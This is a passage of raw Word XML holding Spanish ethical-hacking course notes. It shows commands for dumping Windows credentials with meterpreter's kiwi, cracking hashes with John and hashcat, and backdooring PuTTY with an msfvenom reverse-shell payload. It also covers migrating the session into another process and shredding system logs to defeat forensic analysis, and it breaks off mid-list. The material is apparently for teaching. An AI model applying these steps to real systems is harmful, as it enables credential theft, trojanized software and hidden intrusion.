      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nos permite encontrar </w:t>
      </w:r>
      <w:r w:rsidR="00AE57A6">
        <w:t>credenciales almacenadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en memoria sistemas Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C590F75" w14:textId="764B4A59" w:rsidR="00051E9E" w:rsidRDefault="00051E9E" w:rsidP="00097312">
      <w:r>
        <w:t>Una vez abierta la sesión de superusuario en meterpreter usamos</w:t>
      </w:r>
      <w:r w:rsidR="00AE57A6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16BF19" w14:textId="73C68FD6" w:rsidR="00051E9E" w:rsidRPr="00AE57A6" w:rsidRDefault="00051E9E" w:rsidP="00AE57A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE57A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5E09A" w14:textId="41703B75" w:rsidR="00051E9E" w:rsidRDefault="00AE57A6" w:rsidP="00AE57A6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE57A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CD796A8" wp14:editId="77A01291">
            <wp:extent cx="3946975" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1726558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58629" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId125"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4008628" cy="1052508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A5CC8D" w14:textId="0055CCEA" w:rsidR="00AE57A6" w:rsidRDefault="00D75565" w:rsidP="00AE57A6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lo primero que hay que hacer es un </w:t>
      </w:r>
      <w:r w:rsidRPr="00D75565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y posteriormente podríamos ver las credenciales hasheadas con </w:t>
      </w:r>
      <w:r w:rsidRPr="00D75565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>creds_all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2D58A" w14:textId="5B00ABBD" w:rsidR="00D75565" w:rsidRDefault="00D75565" w:rsidP="00AE57A6">
      <w:r>
        <w:t xml:space="preserve">Podemos usar kiwi help para ver todas las posibilidades. Por ejemplo, no solo ver hashes de contraseñas (para descifrar el hash luego con </w:t>
      </w:r>
      <w:r w:rsidRPr="00D75565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:r>
        <w:t>) sino también cambiarlas</w:t>
      </w:r>
      <w:r w:rsidR="00AE4649">
        <w:t xml:space="preserve"> o comprobar las redes wifi</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A2A6A" w14:textId="2A3D5E68" w:rsidR="00D75565" w:rsidRDefault="00AE4649" w:rsidP="003F71AC">
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">John the </w:t>
      </w:r>
      <w:r w:rsidR="003F71AC" w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ipper: </w:t>
      </w:r>
      <w:r w:rsidR="003F71AC" w:rsidRPr="003F71AC">
        <w:t>Crackeador de contraseñas para descifrar contraseñas</w:t>
      </w:r>
      <w:r w:rsidR="003F71AC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B8F54" w14:textId="207291D5" w:rsidR="003F71AC" w:rsidRPr="003F71AC" w:rsidRDefault="003F71AC" w:rsidP="003F71AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>john --format=(formato a descifrar) --wordlist=(diccionario que queramos usar) (archivo con los hashes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6377A46F" w14:textId="665154EB" w:rsidR="003F71AC" w:rsidRDefault="003F71AC" w:rsidP="003F71AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>john --format=raw-md5 --worlist=/usr/share/wordlists/rockyou.txt hash.md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933B295" w14:textId="38DA9BEA" w:rsidR="003F71AC" w:rsidRDefault="003F71AC" w:rsidP="003F71AC">
      <w:r>
        <w:t xml:space="preserve">Por defecto NO muestra por pantalla el resultado, para ello, debemos agregar la opción </w:t>
      </w:r>
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355423B" w14:textId="71923707" w:rsidR="003F71AC" w:rsidRDefault="003F71AC" w:rsidP="003F71AC">
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Hashcat:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Crackeador de contraseñas, alternativa a </w:t>
      </w:r>
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>John the Ripper</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11560AAC" w14:textId="5E618530" w:rsidR="0016148C" w:rsidRPr="0016148C" w:rsidRDefault="0016148C" w:rsidP="003F71AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">haschat -m (tipo de hash) -a (técnica de ataque) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(archivo) (diccionario a usar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A31C9" w14:textId="0087669F" w:rsidR="003F71AC" w:rsidRPr="0016148C" w:rsidRDefault="0016148C" w:rsidP="003F71AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00AB3213" w:rsidRPr="0016148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ashcat -m 0 -a </w:t>
      </w:r>
      <w:r w:rsidRPr="0016148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00AB3213" w:rsidRPr="0016148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hash.md5 /usr/share/worlists/rock</w:t>
      </w:r>
      <w:r w:rsidRPr="0016148C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>you.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41186060" w14:textId="1BE6E8FD" w:rsidR="0016148C" w:rsidRPr="001176AF" w:rsidRDefault="0016148C" w:rsidP="001176AF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001176AF">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Hay muchos tipos de hash, no solo el 0, depende el programa que haya hasheado la contraseña, por ello, contamos con la Wiki que nos puede ayudar a elegir el tipo de hash hashcat.net/wiki/doku.php?id=example_hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4AF9C" w14:textId="77777777" w:rsidR="00CB12B5" w:rsidRDefault="00CB12B5" w:rsidP="00CB12B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0484FDE4" w14:textId="26C91752" w:rsidR="001176AF" w:rsidRDefault="00CB12B5" w:rsidP="00CB12B5">
      <w:r w:rsidRPr="00CB12B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoor en binarios: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB12B5">
        <w:t>Técnica para añadir a un binario del sistema que ya hayamos vulnerado un backdoor para que podamos entrar de forma recurrente en el sistema</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B905F16" w14:textId="26046943" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00CB12B5">
      <w:r>
        <w:t>Primero descargarmos el exe que queramos modificar, en este ejemplo vamos a suponer que vamos a modificar PuTTY.</w:t>
      </w:r>
      <w:r w:rsidR="0045430B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246FA32" w14:textId="1908B9F6" w:rsidR="0045430B" w:rsidRPr="0045430B" w:rsidRDefault="0045430B" w:rsidP="00CB12B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045430B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DE8CA" w14:textId="5FA2A8C8" w:rsidR="00CB12B5" w:rsidRDefault="00231A90" w:rsidP="00CB12B5">
      <w:r>
        <w:t xml:space="preserve">Podemos crear un exe en </w:t>
      </w:r>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13589103" w14:textId="77777777" w:rsidR="0045430B" w:rsidRDefault="0045430B" w:rsidP="0045430B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045430B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.52.128 lport=4000 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B34CCD" w14:textId="77DA78C8" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="0045430B">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Donde:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622338A" w14:textId="397D2A64" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> corresponde a la arquitectura del sistema a atacar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D00F07" w14:textId="33F2A835" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--platform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> al sistema operativo a atacar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BCC92" w14:textId="254D8158" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> al ejecutable que vamos a backdoorizar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2967C41E" w14:textId="7F12C44D" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> al payload que vamos a esconder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01B124" w14:textId="1FDAB7DF" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el codificado con el que vamos a “esconder” el payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CCB7D6" w14:textId="40782007" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> las vueltas del codificado para esconder el payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B717DA7" w14:textId="7CA6C299" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> caracteres a tener en cuenta para omitir </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24845A00" w14:textId="244ED996" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es el formato de salida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE0C41" w14:textId="16162EAB" w:rsidR="00231A90" w:rsidRDefault="00231A90" w:rsidP="00231A90">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231A90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el nombre del archivo ya modificado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0925FE" w14:textId="72D89DE6" w:rsidR="00231A90" w:rsidRDefault="00814C44" w:rsidP="00231A90">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">De esta forma, ahora solo tendríamos que dejar escuchando el exploit multi/handler en </w:t>
      </w:r>
      <w:r w:rsidRPr="00814C44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con el payload usado anteriormente en msfvenom y esperar que el otro usuario abriera este ejecutable, inmediatamente, debe abrir entonces una sesión en meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E6FF8" w14:textId="3F360BA2" w:rsidR="007F247C" w:rsidRDefault="007F247C" w:rsidP="00231A90">
      <w:r w:rsidRPr="007F247C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1769114F" wp14:editId="76E5DE5A">
            <wp:extent cx="5400040" cy="3084830"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="17716693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69348" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3084830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C122A58" w14:textId="05CA9CC3" w:rsidR="0045430B" w:rsidRDefault="0045430B" w:rsidP="00231A90">
      <w:r>
        <w:t>El problema llega con que si el usuario cierra PuTTY, simplemente se cerrará nuestra sesión de meterpreter, por lo que es necesario conocer las técnicas de Migración de meterpreter a otro proceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B48CB6C" w14:textId="347CC170" w:rsidR="0045430B" w:rsidRPr="0045430B" w:rsidRDefault="0045430B" w:rsidP="0045430B">
      <w:r w:rsidRPr="0045430B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Migración de meterpreter a otro proceso:</w:t>
      </w:r>
      <w:r w:rsidRPr="0045430B">
        <w:t xml:space="preserve"> Para evitar que se cierre el proceso, lo migraremos de manera oculta a otra aplicación en ese sistema. Aparentemente el usuario notará que su PuTTY se ha cerrado. Lo hacemos desde meterpreter con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4B998" w14:textId="672D9A0D" w:rsidR="0045430B" w:rsidRPr="0045430B" w:rsidRDefault="0045430B" w:rsidP="0045430B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045430B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run post/windows/manage/migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D3475" w14:textId="5B7BD0FE" w:rsidR="0045430B" w:rsidRDefault="00F14EA6" w:rsidP="00F14EA6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F14EA6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50BF4C79" wp14:editId="55E5AD13">
            <wp:extent cx="2956816" cy="1158340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5201887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88784" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId127"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2956816" cy="1158340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D8C2C" w14:textId="51286EB2" w:rsidR="00F14EA6" w:rsidRDefault="00F14EA6" w:rsidP="00F14EA6"/>
    <w:p w14:paraId="14C14BAF" w14:textId="2F3DEDDE" w:rsidR="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:ind w:left="720"/>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Borrado de Evidencias</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5A9A">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77FE3221" w14:textId="0885BBEC" w:rsidR="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:r w:rsidRPr="000D27DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D27DE">
        <w:t>Podemos borrar evidencias para que un posterior análisis forense no encuentre pruebas de nuestro ejercicio de hacking ético</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D871485" w14:textId="2179676F" w:rsidR="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:r>
        <w:t>Podemos borrar los archivos con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4981C8E4" w14:textId="7414DA5A" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shred -vfz (fichero)</w:t>
      </w:r>
      <w:r w:rsidR="00FE22FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE22FB" w:rsidRPr="00FE22FB">
        <w:t>-&gt; Borra y sobrescribe 4 veces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53918F74" w14:textId="52B6D8C9" w:rsidR="000D27DE" w:rsidRPr="00FE22FB" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:r w:rsidRPr="000D27DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smr (fichero)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE22FB">
        <w:t>-&gt; Borra y sobrescribe 38 veces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43925C7E" w14:textId="40BAED78" w:rsidR="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Algunos archivos a borrar son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A6F1EC" w14:textId="51CD1458" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:r>
        <w:t>Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD60735" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/messages: mensajes globales del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF79C2" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/secure: información de autenticación y autorización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064EEAE9" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/mail.log: información del servidor de correo del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C96A18C" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/cron: información sobre cuando el demonio cron empieza una tarea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0347A" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/boot.log: información de cuando el sistema arranca.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA0423" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/btmp:  logins fallidos (lastb)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D880F" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
        <w:t>/var/log/wtmp: logins y logouts (last)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B097D05" w14:textId="77777777" w:rsidR="000D27DE" w:rsidRPr="000D27DE" w:rsidRDefault="000D27DE" w:rsidP="000D27DE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D27DE">
